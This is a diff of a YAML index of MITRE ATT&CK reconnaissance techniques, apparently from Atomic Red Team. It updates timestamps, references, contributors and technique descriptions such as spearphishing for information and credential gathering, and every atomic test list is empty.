+        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+          October 23, 2020.
+        url: https://www.exploit-db.com/google-hacking-database
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.002:
     technique:
@@ -55658,7 +56347,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:36:58.964Z'
       name: Business Relationships
       description: |-
         Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -55674,8 +56363,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.003:
     technique:
@@ -55736,29 +56423,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1589.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
-      type: attack-pattern
-      created: '2020-10-02T14:57:15.906Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1589.003
-        url: https://attack.mitre.org/techniques/T1589/003
-      - source_name: OPM Leak
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
-        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:09:45.795Z'
       name: Employee Names
       description: |-
         Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -55767,15 +56435,34 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+      created: '2020-10-02T14:57:15.906Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1589/003
+        external_id: T1589.003
+      - source_name: OPM Leak
+        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.004:
     technique:
@@ -55801,7 +56488,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:35:09.668Z'
       name: Client Configurations
       description: |-
         Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -55819,47 +56506,10 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Philip Winther
-      - Sebastian Salla, McAfee
-      - Robert Simmons, @MalwareUtkonos
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
-      type: attack-pattern
-      created: '2020-10-02T17:08:57.386Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1598.002
-        url: https://attack.mitre.org/techniques/T1598/002
-      - source_name: Sophos Attachment
-        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
-        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
-          links – when phishers bring along their own web pages. Retrieved October
-          20, 2020.'
-      - source_name: GitHub Phishery
-        url: https://github.com/ryhanson/phishery
-        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
-          23, 2020.
-      - source_name: Microsoft Anti Spoofing
-        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
-        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
-          Retrieved October 19, 2020.
-      - source_name: ACSC Email Spoofing
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
-        description: Australian Cyber Security Centre. (2012, December). Mitigating
-          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-05-31T04:18:44.568Z'
       name: Spearphishing Attachment
       description: |-
         Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -55868,19 +56518,55 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Philip Winther
+      - Sebastian Salla, McAfee
+      - Robert Simmons, @MalwareUtkonos
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
         accounts receiving messages from a single unusual/unknown sender. Filtering
         based on DKIM+SPF or header analysis can help detect when the email sender
         is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+      created: '2020-10-02T17:08:57.386Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1598/002
+        external_id: T1598.002
+      - source_name: ACSC Email Spoofing
+        description: Australian Cyber Security Centre. (2012, December). Mitigating
+          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: Sophos Attachment
+        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+          links – when phishers bring along their own web pages. Retrieved October
+          20, 2020.'
+        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+      - source_name: Microsoft Anti Spoofing
+        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+          Retrieved October 19, 2020.
+        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+      - source_name: GitHub Phishery
+        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+          23, 2020.
+        url: https://github.com/ryhanson/phishery
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.004:
     technique:
@@ -55903,7 +56589,7 @@ reconnaissance:
         description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
           Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
           You Can Do About It. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:47:55.905Z'
       name: CDNs
       description: |-
         Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -55919,8 +56605,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591:
     technique:
@@ -55946,7 +56630,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.343Z'
       name: Gather Victim Org Information
       description: |-
         Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -55962,8 +56646,6 @@ reconnaissance:
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590:
     technique:
@@ -55991,7 +56673,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:23.229Z'
       name: Gather Victim Network Information
       description: |-
         Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -56007,12 +56689,10 @@ reconnaissance:
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593:
     technique:
-      modified: '2022-10-18T22:48:33.286Z'
+      modified: '2024-09-12T19:19:47.759Z'
       name: Search Open Websites/Domains
       description: |-
         Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -56021,16 +56701,16 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -56043,8 +56723,8 @@ reconnaissance:
         external_id: T1593
       - source_name: SecurityTrails Google Hacking
         description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-        url: https://securitytrails.com/blog/google-hacking-techniques
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
       - source_name: Cyware Social Media
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
@@ -56055,52 +56735,50 @@ reconnaissance:
         url: https://www.exploit-db.com/google-hacking-database
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1597:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
-      type: attack-pattern
-      created: '2020-10-02T17:01:42.558Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1597
-        url: https://attack.mitre.org/techniques/T1597
-      - source_name: D3Secutrity CTI Feeds
-        url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
-        description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
-          Intelligence Feeds. Retrieved October 20, 2020.
-      - source_name: ZDNET Selling Data
-        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
-        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
-          73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-04T13:12:14.469Z'
       name: Search Closed Sources
       description: |-
-        Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+        Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
 
         Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Barbara Louis-Sidney (OWN-CERT)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
+      type: attack-pattern
+      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+      created: '2020-10-02T17:01:42.558Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1597
+        external_id: T1597
+      - source_name: ZDNET Selling Data
+        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+          73 million user records on the dark web. Retrieved October 20, 2020.
+        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1592.003:
     technique:
@@ -56122,7 +56800,7 @@ reconnaissance:
         url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
         description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
           source code and proprietary data dumped online. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:22:46.759Z'
       name: Firmware
       description: |-
         Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -56138,8 +56816,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.002:
     technique:
@@ -56165,7 +56841,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:33:19.596Z'
       name: Software
       description: |-
         Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -56183,8 +56859,6 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.001:
     technique:
@@ -56206,7 +56880,7 @@ reconnaissance:
         url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:52:40.958Z'
       name: Social Media
       description: |-
         Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -56222,12 +56896,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.001:
     technique:
-      modified: '2023-04-14T23:29:10.396Z'
+      modified: '2024-10-10T13:45:01.069Z'
       name: Credentials
       description: "Adversaries may gather credentials that can be used during targeting.
         Account credentials gathered by adversaries may be those directly associated
@@ -56237,17 +56909,20 @@ reconnaissance:
         elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
         Adversaries may also compromise sites then add malicious content designed
         to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
-        Credential information may also be exposed to adversaries via leaks to online
-        or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
-        breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
-        Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
-        GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
-        may also purchase credentials from dark web or other black-markets. Finally,
-        where multi-factor authentication (MFA) based on out-of-band communications
-        is in use, adversaries may compromise a service provider to gain access to
-        MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
-        this information may reveal opportunities for other forms of reconnaissance
-        (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+        (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+        Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+        GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+        based on out-of-band communications is in use, adversaries may compromise
+        a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+        Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+        adversaries via leaks to online or other accessible data sets (ex: [Search
+        Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+        repositories, etc.). Adversaries may purchase credentials from dark web markets,
+        such as Russian Market and 2easy, or through access to Telegram channels that
+        distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+        2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+        Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+        for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
         or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
         establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
         and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
@@ -56259,6 +56934,7 @@ reconnaissance:
       - Vinayak Wadhwa, Lucideus
       - Lee Christensen, SpecterOps
       - Toby Kohlenberg
+      - Massimo Giaimo, Würth Group Cyber Defence Center
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -56269,7 +56945,7 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
       created: '2020-10-02T14:55:43.815Z'
@@ -56279,6 +56955,10 @@ reconnaissance:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1589/001
         external_id: T1589.001
+      - source_name: Bleeping Computer 2easy 2021
+        description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+          web marketplace for stolen data. Retrieved October 7, 2024.
+        url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
       - source_name: ATT ScanBox
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -56291,6 +56971,10 @@ reconnaissance:
         description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
           19, 2020.
         url: https://github.com/dxa4481/truffleHog
+      - source_name: Bleeping Computer Stealer Logs 2023
+        description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+          Stealer Logs in Context. Retrieved October 10, 2024.'
+        url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
       - source_name: Register Uber
         description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
           into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -56313,6 +56997,10 @@ reconnaissance:
           Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
           October 19, 2020.
         url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+      - source_name: SecureWorks Infostealers 2023
+        description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+          The Growing Threat from Infostealers. Retrieved October 10, 2024.
+        url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
       - source_name: Register Deloitte
         description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
           Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -56320,9 +57008,8 @@ reconnaissance:
         url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.003:
     technique:
@@ -56381,7 +57068,7 @@ reconnaissance:
         adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
         to access valuable information that can be exfiltrated or used to escalate
         privileges and move laterally. "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Wordlist Scanning
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -56401,7 +57088,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1591.004:
     technique:
@@ -56423,7 +57109,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:39:08.904Z'
       name: Identify Roles
       description: |-
         Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -56439,12 +57125,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598:
     technique:
-      modified: '2023-09-08T20:28:49.600Z'
+      modified: '2024-05-31T04:18:44.570Z'
       name: Phishing for Information
       description: "Adversaries may send phishing messages to elicit sensitive information
         that can be used during targeting. Phishing for information is an attempt
@@ -56513,7 +57197,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Avertium callback phishing
         description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
           PHISHING. Retrieved February 2, 2023.
@@ -56561,31 +57245,12 @@ reconnaissance:
         url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.001:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
-      type: attack-pattern
-      created: '2020-10-02T16:54:23.193Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1595.001
-        url: https://attack.mitre.org/techniques/T1595/001
